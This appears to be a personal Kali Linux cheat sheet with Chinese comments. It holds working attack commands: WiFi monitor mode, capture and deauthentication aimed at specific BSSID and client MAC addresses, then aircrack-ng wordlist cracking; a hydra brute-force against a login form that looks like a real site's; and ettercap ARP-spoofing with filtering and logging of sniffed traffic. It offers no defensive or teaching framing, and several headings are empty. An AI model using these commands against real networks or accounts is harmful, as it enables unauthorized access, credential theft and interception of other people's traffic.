kali

source.list

#阿里云kali源
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

wifi

ifconfig wlan0 down
iwconfig wlan0 mode monitor #managed
ifconfig wlan0 up
#启动网卡
airmon-ng start wlan0
airodump-ng -c 11 mon0
airodump-ng -c 11 -w longas --bssid 0C:72:2C:24:E6:8C mon0
aireplay-ng -0 1 -a 0C:72:2C:24:E6:8C -c 7C:1D:D9:74:14:86 mon0
aircrack-ng -w wordlists/1pass00.txt longas-01.cap

hybra

hydra -L user.txt -P psw.txt -o ans.txt -t 1 -f ip http-post-form "/loginAction.do:zjh=^USER^&mm=^PASS^:document.loginForm.zjh.value"

metasploit

wordlist

crunch

ettercap

echo 1 > /proc/sys/net/ipv4/ip_forward
# /etc/sysctl.conf net.ipv4.ip_forward = 1 
# sysctl -p
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.2/80 // -P autoadd
etterfilter filter.ecf -o filter.ef
#search(where, what) 从字符串where中查找what，若找到则返回true
#regex(where, regex) 从字符串where中匹配正则表达式regex，若找到则返回true
#replace(what, with) 把字符串what替换成字符串with
#log(what, where) 把字符串what记录到where文件中
#msg(message) 在屏幕上显示出字符串message
#exit() 退出
etterlog -A sniffed_data.ecp >1.txt